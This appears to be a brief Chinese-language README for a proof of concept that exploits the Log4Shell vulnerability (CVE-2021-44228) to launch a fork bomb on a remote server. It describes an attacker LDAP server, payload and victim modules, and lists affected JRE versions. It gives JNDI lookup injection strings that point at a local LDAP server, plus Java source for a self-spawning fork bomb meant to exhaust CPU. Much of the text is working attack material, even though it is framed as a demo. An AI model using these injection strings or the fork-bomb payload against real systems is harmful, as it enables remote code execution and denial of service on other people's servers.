
💣💥💀 概念验证:利用CVE-2021-44228漏洞在远程服务器上启动fork炸弹的示例
💣💥💀 Proof of Concept: 利用 CVE-2021-44228 漏洞在远程服务器上启动 fork bomb 的示例
创建攻击者的 LDAP 服务器(server 模块),该服务器将提供字符串和代码的表示(payload 模块)
创建受害者示例(victim 模块),并将字符串传递给 Log4j JRE 版本 <= 6u211, 7u201, 8u191 和 11.0.1
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
受害者应用程序将从攻击者服务器接收字节数组,并将其解释为代入字符串或可执行代码(参数 com.sun.jndi.ldap.object.trustURLCodebase = true)
例如,可执行代码将是 fork bomb(一种程序,它会启动自身的副本,耗尽所有 CPU 时间)
public class ForkBomb {
public static void main(String... args) {
Runtime.getRuntime().exec(new String[] {
"javaw",
"-cp",
System.getProperty("java.class.path"),
"ForkBomb"
});
}
}